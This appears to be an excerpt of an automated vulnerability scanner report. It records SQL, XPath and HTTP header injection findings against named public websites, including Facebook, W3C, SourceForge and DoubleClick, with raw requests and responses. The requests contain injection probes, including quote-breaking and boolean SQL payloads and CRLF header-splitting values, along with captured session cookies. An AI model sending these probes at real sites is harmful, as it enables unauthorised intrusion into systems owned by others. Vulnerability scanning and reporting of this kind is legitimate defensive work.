...[SNIP]...

Request 2

GET /subscription-services?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.193. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/preview-current-issue?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/preview-current-issue?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.194. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/subscribe-to-e-newsletter?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/subscribe-to-e-newsletter?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.195. http://www.woothemes.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.woothemes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:11:06 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 26001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
<p>We love the ability to make little tweaks to the themes and away we go! Drop in great content and let the Woo Framework do the rest. Also, the ability to apply different looks as the new themes continue roll out! Splendid Woo Ninja forum support. If you sold those cute woo dolls, I...d buy one!</p></blockquote><div class="author"> <img alt='' src='http://1.gravatar.com/avatar/da1ea33c317a366d03ea9366626bc570?s=30&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D30&amp;r=G' class='avatar avatar-30 photo' height='30' width='30' /><p class="name">Kristi</p><p class="site"><a href="http://yaalife.com">YaaLife</a></p></div><div class="fix"></div></div><div id="steps"><div class="steps-steps"> <a href="http://www.woothemes.com/themes/" title="Browse our Themes Gallery to find the themes that you like best. View the demos and try the themes in our Playground." class="step-single steps-1 tiptip"></a> <a href="http://www.woothemes.com/pricing/" title="Once you've picked your themes, choose the Theme Package that best suits you, or subscribe to our WordPress Themes Club to get all our WordPress themes." class="step-single steps-2 tiptip"></a> <a href="http://www.wordpress.org" title="If you haven't already done so, download WordPress and install it on your web server. Then upload and activate your theme by following our documentation." class="step-single steps-3 tiptip"></a> <a href="http://www.woothemes.com/support/" title="Set up your new WooTheme with the options panel - customizing the look and feel of your website with ease. Ask for help in our support forum where one of our WooNinjas will assist you." class="step-single steps-4 tiptip"></a></div><div class="info-box"> <a href="http://www.woothemes.com/the-woothemes-club/">See our Pricing Options</a> <span style="font-size:14px; font-weight:bold; padding:0 5px;">OR</span> <a href="http://www.woothemes.com/themes/">View our Theme Collection</a></div></div><div id="news"><div id="blog
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:11:07 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 25873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
<p>The WooThemes team just gets ...it.... ...It... being customer service, audience targetting; what people need and what people want all at the same time.</p></blockquote><div class="author"> <img alt='' src='http://1.gravatar.com/avatar/d8cfb29a7cf26b7bad6469f357604f93?s=30&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D30&amp;r=G' class='avatar avatar-30 photo' height='30' width='30' /><p class="name">Gavin Elliott</p><p class="site"><a href="http://www.gavinelliott.co.uk">Website</a></p></div><div class="fix"></div></div><div id="steps"><div class="steps-steps"> <a href="http://www.woothemes.com/themes/" title="Browse our Themes Gallery to find the themes that you like best. View the demos and try the themes in our Playground." class="step-single steps-1 tiptip"></a> <a href="http://www.woothemes.com/pricing/" title="Once you've picked your themes, choose the Theme Package that best suits you, or subscribe to our WordPress Themes Club to get all our WordPress themes." class="step-single steps-2 tiptip"></a> <a href="http://www.wordpress.org" title="If you haven't already done so, download WordPress and install it on your web server. Then upload and activate your theme by following our documentation." class="step-single steps-3 tiptip"></a> <a href="http://www.woothemes.com/support/" title="Set up your new WooTheme with the options panel - customizing the look and feel of your website with ease. Ask for help in our support forum where one of our WooNinjas will assist you." 
class="step-single steps-4 tiptip"></a></div><div class="info-box"> <a href="http://www.woothemes.com/the-woothemes-club/">See our Pricing Options</a> <span style="font-size:14px; font-weight:bold; padding:0 5px;">OR</span> <a href="http://www.woothemes.com/themes/">View our Theme Collection</a></div></div><div id="news"><div id="blog"><h3><a class="feed" href="http://feeds.feedburner.com/WooThemes" title="Subribe to our RSS feed"><img src="http://cdn.wootheme
...[SNIP]...

2. XPath injection
There are 6 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sourceforge.net
Path:   /softwaremap/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /softwaremap/?1'=1 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-5
Set-Cookie: PHPSESSID=c455a0b20479018315450130b7f1284c; expires=Mon, 07-Feb-2011 16:03:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:03:13 GMT
Server: lighttpd/1.4.26
Content-Length: 77436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Create Server: sfs-web-5 -->
<!--
~ SourceForge.net: Find and B
...[SNIP]...
<a href="/softwaremap/?1'=1&fq%5B%5D=trove%3A560">XSL (XSLT/XPath/XSL-FO)</a>
...[SNIP]...

2.2. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.eraser.ee
Path:   /uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /uudised'/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=2f6c7bfae834a40abca6058888b42660; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:05:26 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:05:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...
function(toolTip) {
this.fx.start(1);
},
onHide: function(toolTip) {
this.fx.start(0);
}
});
});var rokboxPath = '/plugins/system/rokbox/';InputsExclusion.push('.content_vote')
</script>
...[SNIP]...

2.3. http://www.facebook.com/miofeghali [wd cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /miofeghali

Issue detail

The wd cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the wd cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80%2527; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=tMW6p; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:45 GMT
Content-Length: 15220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
EBLj3TW5HgxzKpY4YIrmXryfjTIgKaijbCQhxd71Yz9VpuUUlS0rbsbc7WHXdKW7vPgE3kTOvRDMokoKudb2XuNt2t4Zm-OTQpLzdx_oFb7_zDAC_G6VZrWhXKmgJGZZwPcjxs5WmS9yRdd-4y6TTAdk6Kpuw4yw69QsDYCszqX4TJ3RXAbClw6xmH2yNS2MdmuYe2IhrXPATH3JiqDG26c2EnGJ3oq3OeEOOyT41pQNtST1e_Qo4nEQfn9RbspEraP9MoYzdgXXC2ztzQniqL3j06oAlipmU2F8mNQcSaXS1N48B_FOTTy2rmRmWocp-m9yQ0JII2qtxCgKdoJ5fx0" autocomplete="off" />
...[SNIP]...

2.4. http://www.w3.org/TR [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /TR HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:00 GMT
Server: Apache/2
Content-Location: Overview.html
Vary: negotiate,accept-encoding
TCN: choice
Last-Modified: Thu, 20 Jan 2011 15:34:42 GMT
ETag: "896a7-49a48df542880;9d-48046fe28dec0"
Accept-Ranges: bytes
Content-Length: 562855
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:51:00 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a title="Delivery Context: XPath Access Functions 1.0 publication history" href="/standards/history/cselection-xaf">
...[SNIP]...

2.5. http://www.w3.org/TR [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /TR HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:53 GMT
Server: Apache/2
Content-Location: Overview.html
Vary: negotiate,accept-encoding
TCN: choice
Last-Modified: Thu, 20 Jan 2011 15:34:42 GMT
ETag: "896a7-49a48df542880;9d-48046fe28dec0"
Accept-Ranges: bytes
Content-Length: 562855
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:50:53 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a title="Delivery Context: XPath Access Functions 1.0 publication history" href="/standards/history/cselection-xaf">
...[SNIP]...

2.6. http://www.w3.org/TR [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /TR?1'=1 HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:48 GMT
Server: Apache/2
Content-Location: Overview.html
Vary: negotiate,accept-encoding
TCN: choice
Last-Modified: Thu, 20 Jan 2011 15:34:42 GMT
ETag: "896a7-49a48df542880;9d-48046fe28dec0"
Accept-Ranges: bytes
Content-Length: 562855
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:50:48 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a title="Delivery Context: XPath Access Functions 1.0 publication history" href="/standards/history/cselection-xaf">
...[SNIP]...

3. HTTP header injection
There are 15 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6061.194450.CDN.TURN.COM/B4419610.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14a95%0d%0a79f68532ca4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14a95%0d%0a79f68532ca4/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14a95
79f68532ca4
/N6061.194450.CDN.TURN.COM/B4419610.3%3Bsz%3D468x60%3Bord%3D3442293584429726933:
Date: Tue, 25 Jan 2011 04:26:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4319.AOL/B2387887.363

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83d20%0d%0a1d229ae03b9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83d20%0d%0a1d229ae03b9/N4319.AOL/B2387887.363 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83d20
1d229ae03b9
/N4319.AOL/B2387887.363:
Date: Mon, 24 Jan 2011 22:29:18 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

